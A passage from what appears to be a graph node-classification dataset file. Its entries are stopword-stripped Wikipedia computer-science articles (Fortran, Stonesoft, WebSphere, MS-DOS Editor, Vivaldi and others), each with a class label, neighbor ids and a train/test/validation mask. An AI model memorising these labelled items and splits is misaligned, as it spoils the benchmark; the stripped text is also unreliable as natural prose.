compilers nevertheless standard-conforming fortran provide options must provided accordance description facilities appropriate part standard fortran 2003 officially published iso/iec 1539-1:2004 major revision introducing many new features comprehensive summary new features fortran 2003 available fortran working group iso/iec jtc1/sc22/wg5 official web site article major enhancements revision include important supplement fortran 2003 iso technical report tr-19767 enhanced module facilities fortran report provided sub-modules make fortran modules similar modula-2 modules similar ada private child sub-units allows specification implementation module expressed separate program units improves packaging large libraries allows preservation trade secrets publishing definitive interfaces prevents compilation cascades iso/iec 1539-1:2010 informally known fortran 2008 approved september 2010 fortran 95 minor upgrade incorporating clarifications corrections fortran 2003 well introducing select new capabilities new capabilities include final draft international standard fdis available document n1830 important supplement fortran 2008 iso technical specification ts 29113 interoperability fortran c submitted iso may 2012 approval specification adds support accessing array descriptor c allows ignoring type rank arguments latest revision language fortran 2018 earlier referred fortran 2015 significant revision released november 28 2018 fortran 2018 incorporates two previously published technical specifications additional changes new features include support iso/iec/ieee 60559:2011 latest version ieee floating point standard 2019 hexadecimal input/output implicit none enhancements changes although 1968 journal article authors basic already described fortran old-fashioned fortran use several decades vast body fortran software daily use throughout scientific engineering communities jay pasachoff wrote 1984 physics astronomy students simply learn fortran much exists fortran seems unlikely scientists change pascal modula-2 whatever 1993 cecil e. leith called fortran mother tongue scientific computing adding replacement possible language may remain forlorn hope primary language intensive super-computing tasks astronomy climate modeling computational chemistry computational economics computational fluid dynamics computational physics data analysis hydrological modeling numerical linear algebra numerical libraries lapack imsl nag optimization satellite simulation structural engineering weather prediction many floating-point benchmarks gauge performance new computer processors cfp2006 floating-point component spec cpu2006 benchmarks written fortran apart modern codes computational science generally use large program libraries metis graph partitioning petsc trilinos linear algebra capabilities dune fenics mesh finite element support generic libraries since early 2000s many widely used support libraries also implemented c recently c++ hand high-level languages matlab python r become popular particular areas computational science consequently growing fraction scientific programs also written higher-level languages reason facilities inter-operation c added fortran 2003 enhanced iso/iec technical specification 29113 incorporated fortran 2018 shift popularity programming languages also evident selection applications spec cpu 2000 spec cpu 2006 floating point benchmarks software nasa probes voyager 1 voyager 2 originally written fortran 5 later ported fortran 77. software still written fortran ported c. precise characteristics syntax fortran 95 discussed fortran 95 language features portability problem early days agreed upon standard even ibm reference manual computer companies vied differentiate offerings others providing incompatible features standards improved portability 1966 standard provided reference syntax semantics vendors continued provide incompatible extensions although careful programmers coming realize use incompatible extensions caused expensive portability problems therefore using programs pfort verifier 1977 standard national bureau standards nist published fips pub 69 processors purchased u.s. government required diagnose extensions standard rather offer two processors essentially every compiler eventually least option diagnose extensions incompatible extensions portability problem numerical calculations important take account characteristics arithmetic addressed fox et al context 1966 standard port library ideas therein became widely used eventually incorporated 1990 standard way intrinsic inquiry functions widespread almost universal adoption ieee 754 standard binary floating-point arithmetic essentially removed problem access computing environment e.g. program command line environment variables textual explanation error conditions remained problem addressed 2003 standard large collections library software could described loosely related engineering scientific calculations graphics libraries written c therefore access presented portability problem addressed incorporation c interoperability 2003 standard possible relatively easy write entirely portable program fortran even without recourse preprocessor fortran 5 marketed data general corp late 1970s early 1980s nova eclipse mv line computers optimizing compiler quite good minicomputers time language closely resembles fortran 66 name pun earlier fortran iv fortran v distributed control data corporation 1968 cdc 6600 series language based upon fortran iv univac also offered compiler 1100 series known fortran v. spinoff univac fortran v athena fortran fortran 6 visual fortran 2001 licensed compaq microsoft licensed compaq visual fortran provided visual studio 5 environment interface compaq v6 v6.1 vendors high-performance scientific computers e.g. burroughs control data corporation cdc cray honeywell ibm texas instruments univac added extensions fortran take advantage special hardware features instruction cache cpu pipelines vector arrays example one ibm fortran compilers h extended iup level optimization reordered machine code instructions keep multiple internal arithmetic units busy simultaneously another example cfd special variant fortran designed specifically illiac iv supercomputer running nasa ames research center ibm research labs also developed extended fortran-based language called vectran processing vectors matrices object-oriented fortran object-oriented extension fortran data items grouped objects instantiated executed parallel available sun iris ipsc ncube longer supported machine-specific extensions either disappeared time elements incorporated main standards major remaining extension openmp cross-platform extension shared memory programming one new extension coarray fortran intended support parallel programming transit name reduced version ibm 704 fortran language implemented ibm 650 using translator program developed carnegie late 1950s following comment appears ibm reference manual transit automatic coding system c28-4038 copyright 1957 1959 ibm fortran system designed complex machine 650 consequently 32 statements found fortran programmer reference manual acceptable transit system addition certain restrictions fortran language added however none restrictions make source program written transit incompatible fortran system 704 permissible statements ten subroutines could used one program transit statements limited columns 7 56 punched cards used input output ibm 650 three passes required translate source code language compile statements soap assembly language finally produce object program could loaded machine run program using punched cards data input outputting results onto punched cards two versions existed 650s 2000 word memory drum transit transit ii latter machines equipped indexing registers automatic floating point decimal bi-quinary arithmetic appendix manual included wiring diagrams ibm 533 card reader/punch control panel prior fortran 77 number preprocessors commonly used provide friendlier language advantage preprocessed code could compiled machine standard fortran compiler preprocessors would typically support structured programming variable names longer six characters additional data types conditional compilation even macro capabilities popular preprocessors included flecs iftran mortran sftran s-fortran ratfor ratfiv ratfor ratfiv example implemented c-like language outputting preprocessed code standard fortran 66 despite advances fortran language preprocessors continue used conditional compilation macro substitution one earliest versions fortran introduced '60s popularly used colleges universities developed supported distributed university waterloo watfor based largely fortran iv student using watfor could submit batch fortran job syntax errors program would move straight execution simplification allowed students concentrate program syntax semantics execution logic flow rather dealing submission job control language jcl compile/link-edit/execution successive process es complexities mainframe/minicomputer environment side simplified environment watfor good choice programmers needing expanded abilities host processor e.g. watfor typically limited access i/o devices watfor succeeded watfiv later versions lrltran developed lawrence radiation laboratory provide support vector arithmetic dynamic storage among extensions support systems programming distribution included ltss operating system fortran-95 standard includes optional part 3 defines optional conditional compilation capability capability often referred coco many fortran compilers integrated subsets c preprocessor systems simscript application specific fortran preprocessor modeling simulating large discrete systems f programming language designed clean subset fortran 95 attempted remove redundant unstructured deprecated features fortran statement f retains array features added fortran 90 removes control statements made obsolete structured programming constructs added fortran 77 fortran 90 f described creators compiled structured array programming language especially well suited education scientific computing lahey fujitsu teamed create fortran microsoft .net framework silverfrost ftn95 also capable creating .net code following program illustrates dynamic memory allocation array-based operations two features introduced fortran 90 particularly noteworthy absence loops statements manipulating array mathematical operations applied array whole also apparent use descriptive variable names general code formatting conform contemporary programming style example computes average data entered interactively program average end program average fortran standards committee meeting name fortran 77 chosen satirical technical proposal incorporated official distribution bearing title letter considered harmful proposal purported address confusion sometimes arises letter numeral zero eliminating letter allowable variable names however method proposed eliminate letter character set entirely thereby retaining 48 number lexical characters colon increased 49 considered beneficial would promote structured programming making impossible use notorious statement troublesome statements would also eliminated noted might invalidate existing programs probably non-conforming anyway assumed-length arrays added dispute appropriate character separate upper lower bounds comment examining arguments dr. walt brainerd penned article entitled astronomy vs. gastroenterology proponents suggested using star asterisk others favored colon fortran 77 earlier versions variable names beginning letters i–n default type integer variables starting letters defaulted real although programmers could override defaults explicit declaration led joke fortran god real unless declared integer",
    "neighbors": [
      7684,
      7173,
      10757,
      9224,
      3594,
      6157,
      15,
      6160,
      9231,
      5651,
      4630,
      10776,
      3613,
      9245,
      3104,
      10786,
      547,
      10280,
      45,
      5677,
      6705,
      5172,
      5684,
      1591,
      3642,
      2620,
      6718,
      577,
      3650,
      3138,
      9794,
      10819,
      1606,
      5703,
      2120,
      8262,
      8775,
      1611,
      9804,
      1613,
      2638,
      9808,
      9811,
      6228,
      8792,
      1116,
      2652,
      6242,
      10340,
      10345,
      1130,
      2155,
      623,
      9330,
      3705,
      7292,
      1152,
      9345,
      10881,
      1673,
      9871,
      10387,
      11411,
      5783,
      7326,
      4255,
      8868,
      1702,
      6311,
      7847,
      4777,
      8876,
      7341,
      10413,
      8879,
      1203,
      692,
      9397,
      3771,
      1724,
      6338,
      1219,
      6850,
      8900,
      5830,
      8902,
      2761,
      5833,
      10953,
      6349,
      721,
      7889,
      9944,
      10458,
      11488,
      6369,
      11490,
      7395,
      228,
      1253,
      9444,
      10470,
      4840,
      6378,
      10474,
      10475,
      9455,
      10991,
      5361,
      9208,
      5881,
      3323,
      7421,
      1278,
      2303,
      7940,
      9479,
      5896,
      7432,
      1804,
      8973,
      10508,
      276,
      5911,
      1826,
      3876,
      7469,
      2352,
      305,
      6450,
      8502,
      823,
      10040,
      11574,
      4410,
      10043,
      10555,
      10561,
      4930,
      1349,
      2374,
      7494,
      1864,
      10569,
      5450,
      8523,
      8524,
      847,
      5455,
      11604,
      9557,
      2903,
      5463,
      2394,
      859,
      10586,
      11618,
      10083,
      8549,
      4966,
      6502,
      11625,
      8554,
      9587,
      11125,
      2936,
      3448,
      7032,
      3966,
      9599,
      4992,
      6016,
      3462,
      8582,
      9606,
      1933,
      5006,
      8079,
      11661,
      10641,
      2450,
      8082,
      11666,
      406,
      6552,
      11674,
      1435,
      1947,
      6044,
      6558,
      1951,
      1952,
      7580,
      9633,
      8611,
      7076,
      3493,
      10145,
      11681,
      7593,
      9643,
      428,
      9133,
      5551,
      9139,
      10675,
      5557,
      8631,
      1976,
      6074,
      443,
      7612,
      1469,
      963,
      8644,
      5574,
      11207,
      1480,
      462,
      1999,
      976,
      4049,
      5584,
      5585,
      5588,
      11219,
      2519,
      2008,
      4057,
      477,
      6109,
      10720,
      2533,
      4069,
      8680,
      7147,
      5612,
      7148,
      10732,
      8175,
      10734,
      3573,
      3062,
      1016,
      8188,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3961,
    "label": 5,
    "text": "Veronica_(search_engine):veronica search engine veronica search engine system gopher protocol released november 1992 steven foster fred barrie university nevada reno existence veronica constantly updated database names almost every menu item thousands gopher servers veronica database could searched major gopher menus although original veronica database longer accessible various local veronica installations least one complete rewrite veronica-2 still exist search engine named character veronica lodge archie comics intentional analogy naming archie search engine search engine ftp servers backronym veronica easy rodent-oriented net-wide index computer archives",
    "neighbors": [
      6657,
      7943,
      9757,
      10910,
      3110,
      10791,
      9905,
      9908,
      4661,
      10808,
      5054,
      10174,
      7364,
      10057,
      10060,
      4310,
      5078,
      6231,
      10722,
      494,
      1520,
      9843,
      6133,
      3191,
      5114,
      8443,
      637
    ],
    "mask": "Test"
  },
  {
    "node_id": 3962,
    "label": 4,
    "text": "Stonesoft_Corporation:stonesoft corporation stonesoft corporation public company developed sold network security solutions based helsinki finland publicly owned 2013 acquired intel subsidiary mcafee stonesoft business globally regional headquarters atlanta georgia united states sales offices throughout europe middle east china july 2013 mcafee part intel security completed tender offer acquire stonesoft products technologies stonesoft became part mcafee network security business unit stonesoft firewall products renamed mcafee next generation firewall mcafee sold stonesoft forcepoint january 2016 stonesoft started systems integrator nordic regions europe 1994 introduced stonebeat technology creating high availability pair firewalls active-passive configuration 1999 company extended stonebeat patented load balancing clustering technology launching stonebeat fullcluster one first technologies certified check point opsec program 2001 stonesoft expanded product set firewall/vpn space becoming direct competitor check point stonegate firewall/vpn launched march 19 2001 january 2003 company introduced first virtual firewall/vpn solution ibm mainframes 2010 company released information via cert-fi advanced evasion technique aets met skepticism community aets released 2011 eventually verified independent labs researchers 2012 “ stonesoft ” replaced “ stonegate ” product name stonesoft used company product name stonesoft corporation product sales q3 2012 circa 5.6 million euros product sales grew approximately 18 q3 net sales approximately 9.2–9.3 million euros equals growth by14-16 growth lower expected product portfolio includes firewall/vpn devices ips intrusion detection prevention systems ssl vpn systems available hardware appliances software vmware-certified virtual appliances components well third-party devices managed stonesoft management center product portfolio differentiates unique clustering load balancing technologies based company older stonebeat technology originally developed check point firewall-1 stonesoft current product portfolio divided five major categories stonesoft firewall/vpn placed gartner magic quadrant enterprise network firewalls several years currently placed niche quadrant gartner notes stonesoft serves set placements well – usually high availability key leaders otherwise welcome stonesoft firewall/vpn regarded robust performance feature set relative company resources loyal customer base stonesoft ips also placed gartner magic quadrant network intrusion prevention currently “ visionaries ” quadrant also certified icsa labs network intrusion prevention detection category one four vendors consortium achieve certification stonesoft also received favorable reviews nss labs next generation firewall capability 2012 intrusion detection prevention system 2008 helsinki court appeal issued decision case brought stonesoft several members management team court held two members company board directors former ceo gross negligence failed give profit warning due time issue hand discrepancies profitability forecasted company year 2000 interim reports actual state company time reports indicated company sound profitable yet profit warning fact issued district court helsinki originally dismissed claims decision november 15 2006 2010 stonesoft informed public new evasion technique bypass security defences stonesoft defines advanced evasion techniques aets ” virtually limitless quantity unrecognizable conventional detection methods work levels tcp/ip stack work across many protocols protocol combinations. ” according max nyman stonesoft corporation senior marketing manager aets deliver malicious code without detection without leaving trace july 23 2012 stonesoft released free tool enables organisations test network security",
    "neighbors": [
      704,
      2721,
      9764,
      8998,
      6153,
      779,
      939,
      6516,
      5749,
      10772,
      7097,
      3162,
      4475,
      1916
    ],
    "mask": "Train"
  },
  {
    "node_id": 3963,
    "label": 5,
    "text": "MacJournal:macjournal macjournal journaling blogging software originally developed mac os x published dan schimpf software macjournal offers basic text formatting limited page layout features macjournal audience includes diarists bloggers podcasters macjournal supports online blog tools including livejournal blogger movable type wordpress also contains powerful searching capabilities allows keeping multiple nested journals includes password protection aes-256 encryption palm pda syncing macjournal written dan schimpf awarded best mac os x student product 2002 apple design awards initially distributed freeware made shareware 2004 project purchased mariner software schimpf hired continue development 2012 macjournal given editors choice award macworld early 2019 development distribution macjournal reverted mariner software back original developer dan schimpf march 2019 dan schimpf software released version 7.0.0 macjournal freeware may 2019 schimpf continuing active development macjournal releasing occasional beta updates",
    "neighbors": [
      576,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3964,
    "label": 4,
    "text": "Guided_tour_puzzle_protocol:guided tour puzzle protocol guided tour puzzle gtp protocol cryptographic protocol mitigating application layer denial service attacks aims overcome shortcoming computation-based puzzle protocols clients required compute hard cpu memory-bound puzzles favor clients abundant computational resources guided tour puzzle protocol seen form proof-of-work pow protocol protocol steps guided tour puzzle protocol similar client puzzle protocol clients required complete guided tour puzzle prior receiving service server server suspects currently denial service attack load exceeds pre-defined threshold simply put guided tour puzzle tour needs completed taking multiple round-trips set special nodes called tour guides sequential order called guided tour order tour guides visited unknown client tour guide direct client towards next tour guide client complete tour correct order single tour guide may appear multiple times tour term stop used denote single appearance tour guide tour client knows tour guide next stop completing visit current stop solving guided tour puzzle essentially equal completing guided tour correct order starting first stop client contacts stop receives reply reply contains unique token token reply message current stop used computing address next stop tour guide address first stop tour guide computed using token contained server first reply message informs client start puzzle process client must send token received current stop tour guide next stop tour guide use input token calculation function token received last stop tour guide plus token server puzzle message sent server proof completion tour server efficiently validate two tokens grants service client proving validity guided tour puzzle start formula_1 tour guides set system formula_2 meanwhile server establishes shared secret formula_3 tour guide formula_4 using secure channel formula_5 server keeps short-lived secret formula_6 computing first hash value returned client part puzzle message puzzle message also contains length tour formula_7 used control difficulty guided tour puzzle figure shows example guided tour formula_8 formula_9 details protocol step guided tour puzzle protocol explained following cpu-bound computational puzzle protocols client puzzle protocol mitigate effect denial service attack attacker wants overwhelm server puzzles compute computational resources needs expend however due variation computational powers clients clients strong computational power solve puzzles much higher rate destitute clients unfairly take server resources another crucial shortcoming computational puzzle protocols clients including legitimate clients required perform cpu-intensive computations contribute meaningful service application guided tour puzzle protocol enforces delay clients round trip delays clients requests arrive rate sustainable server advantage using round-trip delays opposed hard computational problems round trip delay small packet determined mostly processing delays queuing delays propagation delays intermediate routers therefore beyond control end hosts clients even attacker abundant computational resources unfairly take advantage poorly provisioned legitimate clients furthermore guided tour puzzle protocol computation required client trivial since length guided tour usually small number order tens lower bandwidth overhead completing guided tour also trivial result clients burdened heavy computations usually required cpu-bound memory bound puzzle protocols",
    "neighbors": [
      2409,
      4490,
      8731,
      519
    ],
    "mask": "None"
  },
  {
    "node_id": 3965,
    "label": 1,
    "text": "Report_Definition_Language:report definition language report definition language rdl standard proposed microsoft defining reports rdl xml application primarily used microsoft sql server reporting services rdl usually written using visual studio although also third-party tools may also created edited hand text editor sql server reporting services 3rd party reporting frameworks use rdl define charts graphs calculations text images links report objects render variety formats three high-level sections typical rdl file",
    "neighbors": [
      11030,
      1366,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 3966,
    "label": 8,
    "text": "IBM_WebSphere_Application_Server:ibm websphere application server websphere application server software product performs role web application server specifically software framework middleware hosts java-based web applications flagship product within ibm websphere software suite initially created donald f. ferguson later became cto software dell first version launched 1998 websphere application server built using open standards java ee xml web services supported following platforms windows aix linux solaris ibm z/os beginning version 6.1 version 9.0 open standard specifications aligned common across platforms platform exploitation extent takes place done open standard specification line works number web servers including apache http server netscape enterprise server microsoft internet information services iis ibm http server i5/os ibm http server z/os ibm http server aix/linux/microsoft windows/solaris uses port 9060 connection default administration port port 9080 default website publication port case install websphere instances values changed traditional opposed liberty variant websphere application server platform architected distributed computing platform could installed multiple operating system instances collectively referred websphere cell management instances could done management node called deployment manager within cell deployment applications including ability perform rolling updates could pushed subset cell nodes configuration information entire cell many nodes applications deployed applications configured session management details resources etc tracked xml configuration files distributed throughout cell every node product lifetime implementation configuration details went files database-based around v3.5 back files around v5 given distributed install given also management entire cell required management local effects deployment logging configuration etc overall effect security could often override local security configured properly example earlier versions management console option available specify location log file remote node could used read write arbitrary file remote node reason advisable run application server node agent processes root privileges starting v6 security configuration defaulted box secure state even meant enabling desired functions required manual changing defaults originally nodes cell single domain management well application security however v6.1 support multiple security domains introduced ability separate administrative application security many ibm products ibm infosphere datastage use websphere application server base platform infrastructure ibm shipped several versions editions websphere application server first beta versions websphere called servlet express although versioning scheme x.1 x.5 would usually indicate minor release software industry websphere v6.1 v5.1 major releases like websphere v8.5 v3.5 websphere liberty introduced websphere application server v8.5 originally referred websphere liberty profile version numbering scheme rest 2016 ibm introduced new fix pack numbering scheme liberty reflect move continuous delivery liberty single support stream v8.5.5.9 liberty numbering scheme rebased starting 16.0.0.2 reflect year quarter liberty fixpack release common level websphere liberty distributed part version 8.5 version 9.0 websphere application server liberty continuous delivery model introduced allow new capabilities features delivered frequent basis.. websphere application server v9.0 adds java ee 7 java se 8 default also provides configured run java se 7 brought application server traditional level java ee websphere liberty offered since 2015 first release made simultaneously available on-premises offering websphere service ibm cloud.. websphere liberty increasingly focus new cloud native applications liberty 16.0.0.2 version liberty included version 9.0.0.0 liberty 16.0.0.3 adds support new microprofile programming model simplifies cloud native application development using standard java ee technologies flexible access websphere liberty provided additional distributions docker image cloud foundry buildpack september 2017 ibm moved ongoing development liberty new open source project called open liberty open liberty source liberty runtime websphere application server distributions open liberty supported openliberty.io community ibm provides commercial support liberty websphere application server websphere application server v8.5.5 includes significant enhancements liberty profile including support java se 8 full java ee 7 compliance since v8.5.5.6 websphere intelligent management capabilities websphere liberty support java ee enabled configuration sets features different sets library features available edition liberty core edition includes liberty features required java ee webprofile editions add liberty features full java ee 7 network deployment edition adds liberty features intelligent management beyond z/os edition adds liberty features enable z/os platform capabilities websphere application server v8.5 offers java ee 6 java se 6 default v8.0 also provides configured run java se 7 primary new capabilities v8.5 liberty profile websphere application server intelligent management features liberty profile websphere application server included commercial editions server providing lightweight profile server web mobile osgi applications release functional subset full profile websphere application server development production use install size 50 mb startup time around 3 seconds new xml-based server configuration treated development artifact aid developer productivity server capabilities engaged set features defined server configuration features added removed dynamically internal use osgi services new model provided moving applications pipeline development production packaged server complete archive server server configuration application unzip deploy centralized managed install optionally available job manager component websphere application server network deployment edition intelligent management capability added network deployment z/os editions websphere application server integrates operational features previously available separate websphere virtual enterprise wve offering application editioning server health management dynamic clustering intelligent routing compute grid also included network deployment z/os editions websphere application server previously separately priced websphere xd compute grid feature scheduling managing java batch workloads version released september 9 2008 java ee 5 compliant application server following flagship features introduced websphere application server version 7 flexible management facilitates administration large number websphere application server base edition network deployment topologies might geographically distributed business-level application used managing application artifacts independent packaging programming models property based configuration feature simplifies experience automating administration administrator update websphere application server version 7 configuration using simple property file general availability websphere application server v7 websphere application server v8 2011 number additional capabilities made available v7 form feature packs optionally added v7 install feature pack content quality support main release content purpose feature pack deliver new innovation next major release following feature packs provided websphere application server v7 version released june 30 2006 september 11 2012 ibm extended end service v6.1 full year september 30 2013 announced new version-to-version migration incentives assistance java ee 1.4 compliant application server includes following function support ejb 3.0 technology support webservices standards provided ejb feature pack webservices feature packs respectively function feature packs folded main product version 7 functions webservices feature pack include version 6 functionality previously found websphere business integration server foundation wbisf moved new ibm websphere process server function moved editions express version released january 16 2004 j2ee 1.4 compliant application server version released november 19 2002 j2ee 1.3 certified application server major rewrite v3/v4 codebase first time websphere application server coded common codebase across deployment platforms intel x86 mainframe substantially code database-based configuration repository replaced replication xml file-based configuration repository service called deployment manager master copy cell configuration nodes file needed copied master server whenever changed v5 also included miniature version mq 5.3 called embedded java message service jms server j2ee 1.2 certified application server inherited database-based configuration model v3.x single-server edition already used xml datastore websphere 3.5 first widely used version websphere ibm adds javabean corba linux support comes two editions standard edition se advanced edition ae initial release june 1998 primarily java servlet engine websphere application server security model based services provided operating system java ee security model websphere application server provides implementations user authentication authorization mechanisms providing support various user registries authentication mechanisms supported websphere java ee application servers",
    "neighbors": [
      9229,
      7695,
      10271,
      2596,
      44,
      5677,
      10800,
      2106,
      6714,
      595,
      8792,
      2658,
      7784,
      9838,
      11376,
      2168,
      3705,
      11386,
      6284,
      6797,
      8350,
      3746,
      3237,
      6311,
      7338,
      9387,
      11439,
      9397,
      6334,
      6860,
      225,
      1250,
      4837,
      6379,
      5356,
      2287,
      5872,
      9455,
      3323,
      4358,
      7430,
      7443,
      5910,
      1304,
      10526,
      7457,
      8994,
      10020,
      4906,
      7983,
      823,
      10040,
      5450,
      3920,
      6993,
      1363,
      5460,
      4439,
      4960,
      865,
      2404,
      9580,
      10611,
      9078,
      1399,
      3960,
      1400,
      10622,
      11134,
      1920,
      4485,
      910,
      5006,
      7567,
      1937,
      11682,
      9635,
      9125,
      5031,
      9647,
      9138,
      6067,
      5048,
      6074,
      1467,
      8122,
      10683,
      5567,
      9665,
      2501,
      1991,
      3545,
      7134,
      479,
      3558,
      3560,
      3561,
      3562,
      4587,
      499,
      8691,
      6651,
      8700,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3967,
    "label": 4,
    "text": "Prefix_WhoIs:prefix whois prefix whois open source project develops operates free whois-compatible framework stockpiling querying various routing registry information prefix whois uses global bgp routing data learned many isp backbone routers information sources also supported imported data every regional internet registry afrinic apnic arin lacnic ripe geocoding information project mentioned number popular network security network engineering books articles many public servers around world operate mirrors prefix whois making information generally available worldwide service may used client using standard whois protocol dns address whois.pwhois.org resolves prefix whois server nearest client based anycast dns several client software packages available prefix whois commercial vendors include free open source utilities whob layer four traceroute prefix whois project distributes c php libraries direct access prefix whois servers http simplequery interface also available software made available custom license",
    "neighbors": [
      3755,
      8204,
      6229
    ],
    "mask": "Test"
  },
  {
    "node_id": 3968,
    "label": 4,
    "text": "Small_subgroup_confinement_attack:small subgroup confinement attack cryptography subgroup confinement attack small subgroup confinement attack cryptographic method operates large finite group attacker attempts compromise method forcing key confined unexpectedly small subgroup desired group several methods found vulnerable subgroup confinement attack including forms applications diffie–hellman key exchange dh-eke",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3969,
    "label": 4,
    "text": "Long-term_support:long-term support long-term support lts product lifecycle management policy stable release computer software maintained longer period time standard edition term typically reserved open-source software describes software edition supported months years longer software standard edition short term support sts term distinguishes support policy software standard edition sts software comparatively short life cycle may afforded new features omitted lts edition avoid potentially compromising stability compatibility lts release lts applies tenets reliability engineering software development process software release life cycle long-term support extends period software maintenance also alters type frequency software updates patches reduce risk expense disruption software deployment promoting dependability software necessarily imply technical support beginning long-term support period software developers impose feature freeze make patches correct software bugs vulnerabilities introduce new features may cause regression software maintainer either distributes patches individually packages maintenance releases point releases service packs conclusion support period product either reaches end-of-life receives reduced level support period time e.g. high-priority security patches upgrading software decision-maker might consider risk cost upgrade software developers add new features fix software bugs accidentally introduce new bugs break old functionality flaw occurs software called regression two ways software publisher maintainer reduce risk regression release major updates less frequently allow users test alternate updated version software lts software applies two risk-reduction strategies lts edition software published parallel sts short-term support edition since major updates sts edition published frequently offers lts users preview changes might incorporated lts edition changes judged sufficient quality using older versions software may avoid risks associated upgrading may introduce risk losing support old software long-term support addresses assuring users administrators software maintained specific period time updates selected publication carry significantly reduced risk regression maintainers lts software publish updates either low risk reduce risk security patches patches lts software published understanding installing less risky installing table lists specific lts version addition normal release cycle many projects centos provide long period support every release",
    "neighbors": [
      5636,
      10756,
      10255,
      1553,
      6162,
      2075,
      4636,
      9245,
      5663,
      546,
      9253,
      3114,
      9771,
      5677,
      7223,
      6718,
      3654,
      5703,
      1101,
      10317,
      1107,
      4192,
      10851,
      9320,
      1646,
      5747,
      5755,
      11388,
      7810,
      132,
      6276,
      9351,
      4755,
      10392,
      11418,
      3229,
      4777,
      692,
      2236,
      6338,
      8387,
      8909,
      5335,
      6361,
      10971,
      3296,
      9953,
      4841,
      6890,
      7913,
      237,
      3320,
      5369,
      6910,
      292,
      7980,
      7983,
      2864,
      11567,
      6454,
      823,
      1353,
      3413,
      7515,
      9064,
      10088,
      8554,
      877,
      6533,
      8582,
      10631,
      7561,
      394,
      1422,
      7567,
      916,
      4011,
      6576,
      1970,
      4023,
      9151,
      10687,
      8644,
      7626,
      467,
      8147,
      11221,
      3030,
      5078,
      10710,
      6622,
      3552,
      8177,
      2036,
      2550,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 3970,
    "label": 3,
    "text": "MS-DOS_Editor:ms-dos editor ms-dos editor commonly called edit edit.com character-based text editor comes ms-dos since version 5 32-bit versions microsoft windows superseded edlin standard editor earlier versions ms-dos 6.22 actually qbasic running editor mode dos 7 windows 95 qbasic removed ms-dos editor became standalone program editor sometimes used substitute notepad windows 9x notepad limited small files editor edit files 65,279 lines approximately 5 mb size ms-dos versions limited approximately depending much conventional memory free editor launched typing run command dialog windows typing codice_1 command-line interface edit still included later versions windows windows xp windows vista 32 bit windows 7 32 bit windows 8 32 bit 16-bit dos application directly run 64-bit windows versions edit version 1.0 appeared ms-dos ibm pc dos 5.00 os/2 windows nt 4.0 early chicago betas included version editors rely qbasic 1.0 version open one file limit dos memory although editor open one file also open quick help file split window edit version 1.1 appeared ms-dos 6.0 new features added editor main difference qbasic 1.1 used show ms-dos 6.0 help version available also versions windows 9x although files unchanged 6.22 renaming help.hlp edit.hlp allows one access dos 6 help system inside editor including cut paste help system open file pc dos 6 include edit command instead dos e editor upgraded support mouse menus version 7.0 edit version 2.0 appeared windows 95 appears windows 2000 later using qbasic still 16-bit dos program included 64-bit version windows directly work one version edit run dos 3.30 higher requires 80286 nec v20/v30 processor higher run 8088 8086 processor cause system stop responding freedos version developed shaun raven licensed gpl ms-dos editor uses text user interface color scheme adjusted multiple document interface version 2.0 included dos 7 windows 9x open 9 files time earlier versions included dos 5 6 limited one file screen split vertically two panes used view two files simultaneously different parts file also open files binary mode fixed number characters displayed per line newlines treated like character mode shows characters hexadecimal characters 0-9 a-f editor converts unix newlines dos newlines mouse support features added 1995 version 2.0 release windows 95",
    "neighbors": [
      8834,
      6148,
      10631,
      2568,
      6281,
      6797,
      3856,
      8976,
      6674,
      4248,
      8729,
      4001,
      4771,
      292,
      7847,
      808,
      7983,
      7088,
      10033,
      10289,
      9907,
      9780,
      9525,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      8517,
      1741,
      4174,
      9166,
      1750,
      9946,
      10727,
      6506,
      8301,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      5492,
      8692,
      11249,
      6396
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3971,
    "label": 5,
    "text": "Vivaldi_(web_browser):vivaldi web browser vivaldi freeware cross-platform web browser developed vivaldi technologies company founded opera software co-founder former ceo jon stephenson von tetzchner tatsuki tomita officially launched april 6 2016 although intended general users first foremost targeted towards technically-inclined users well former opera users disgruntled transition presto layout engine chromium-based browser resulted loss many iconic features despite also chromium-based vivaldi aims revive features presto-based opera proprietary modifications march 2019 vivaldi 1.2 million active monthly users vivaldi began virtual community website replaced opera shut opera software march 2014 jon stephenson von tetzchner angered decision believed community helped make opera web browser tetzchner launched vivaldi community—a virtual community focused providing registered users discussion forum blogging service numerous practical web services—to make opera closure later january 27 2015 vivaldi technologies launched—with community mind—the first technical preview vivaldi web browser name comes italian composer antonio vivaldi according one creators easy name remembered understood worldwide vivaldi minimalistic user interface basic icons fonts color scheme changes based background design web page visited browser also allows users customize appearance ui elements background color overall theme address bar tab positioning start pages according ceo jon von tetzchner vivaldi vast unique customizability huge part browser caters experienced users vivaldi features ability stack tile tabs annotate web pages add notes bookmarks furthermore users place digital bookmarks speed dial page quick access harness quick commands search bookmarks browsing history open tabs settings vivaldi built around based web technologies html5 node.js react.js numerous npm modules technical preview 4 vivaldi also supports numerous mouse gestures actions like tab switching keyboard activation vivaldi also set chromeless ui gives users screen real-estate ability focus single page without distractions accommodate users prefer use large number tabs time vivaldi supports hibernation individual tabs tab stacks freeing resources user actively use tabs chromium-based browser vivaldi use many browser extensions developed google chrome users install directly chrome web store work properly vivaldi exception user interface customizations vivaldi interface quite different chrome company hopes integrate email client m3 future version vivaldi developers planning release extension platform vivaldi statcounter estimates vivaldi 0.05 market share desktop browsers december 2018 ars technica reviewer scott gilbertson wrote version 1.0 april 2016 praised innovative features tab handling noting likely remain niche browser see widespread uptake october 2018 gilbertson gave version 2.0 positive review stated vivaldi usual browser would hard put go back browser without unique features",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      3109,
      10791,
      9768,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      5205,
      6231,
      8281,
      6747,
      6237,
      1642,
      9834,
      9841,
      4722,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      11418,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
